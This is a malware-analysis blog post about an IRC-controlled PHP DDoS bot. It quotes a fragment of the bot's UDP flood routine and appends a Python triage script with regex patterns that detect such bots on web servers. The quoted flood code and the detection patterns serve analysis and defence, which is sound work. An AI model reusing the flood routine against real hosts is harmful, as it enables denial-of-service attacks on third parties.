PHP DDOS Bot

Every so often I run into some new evil that interests me enough to take a deeper peek. This time a DDOS bot written in PHP caught my eye. I haven’t seen this in the wild anywhere, but it’s still quite interesting.

The bot itself is a pure DDOS bot that supports UDP, TCP and HTTP DDOS attacks. It seems to be either some kind of PoC (Proof of Concept) or the handiwork of some inexperienced malware writer. It doesn’t support any authentication, so basically anyone could command the botnet if they know the server and channel where it sits. On top of that, the attack routines are a bit inefficient:

[code]

fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
    //echo "$errstr ($errno)<br>\n"; //troep
    exit;
}
else
{
    $char = "a";
    for($a = 0; $a < 9999999999999; $a++)
        $data = $data.$char;

[/code]

Based on the variable names, the author of this malware is pretty likely from Germany, though Austria and Switzerland are possibilities too.
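For defenders, the traits visible in the excerpt (IRC verbs written to a socket, a raw socket whose target comes from a variable, an enormous loop bound) can be turned into a static triage check for PHP files found on a web server. The following is an added example, not part of the original post or the bot; the indicator names, weights and threshold are assumptions, and the benign sample is constructed.

```python
import re

# Excerpt of the bot source quoted in the article (truncated there as well).
BOT_SAMPLE = r'''
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;
'''

# Constructed benign sample: fixed-host socket use and a small loop.
BENIGN_SAMPLE = r'''
$fp = fsockopen("tcp://mail.example.test", 25, $errno, $errstr, 30);
fputs($fp, "HELO web01.example.test\r\n");
for ($i = 0; $i < 100; $i++) { $lines[] = fgets($fp, 512); }
'''

# name -> (pattern, weight). Weights and THRESHOLD are assumptions for this example.
INDICATORS = {
    # IRC verb written to a socket handle
    "irc_write": (re.compile(r"\b(?:fputs|fwrite)\s*\([^;]*\b(?:privmsg|notice)\s+\S+\s+:", re.I), 2),
    # raw socket whose destination is interpolated from a variable
    "socket_var_target": (re.compile(r"\bfsockopen\s*\(\s*[\"'](?:udp|tcp)://[^\"']*\$\w+", re.I), 2),
    "udp_socket": (re.compile(r"\bfsockopen\s*\(\s*[\"']udp://", re.I), 1),
    # loop bound of 7+ digits, as in the payload-building loop
    "huge_loop": (re.compile(r"\bfor\s*\([^;]*;\s*\$\w+\s*<=?\s*\d{7,}\s*;", re.I), 1),
}
THRESHOLD = 4


def normalize(src):
    """Map typographic quotes (common in samples pasted from web pages) to ASCII."""
    return src.translate({0x201C: '"', 0x201D: '"', 0x2018: "'", 0x2019: "'"})


def triage(src):
    """Return (score, sorted indicator names) for a PHP source string."""
    text = normalize(src)
    hits = sorted(name for name, (rx, _) in INDICATORS.items() if rx.search(text))
    return sum(INDICATORS[name][1] for name in hits), hits


def is_suspicious(src):
    return triage(src)[0] >= THRESHOLD


if __name__ == "__main__":
    for label, sample in (("bot excerpt", BOT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(sample), is_suspicious(sample))
```

A score at or above the threshold is a reason to pull the file for manual review, not a verdict; legitimate PHP IRC clients would also trip the `irc_write` indicator.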
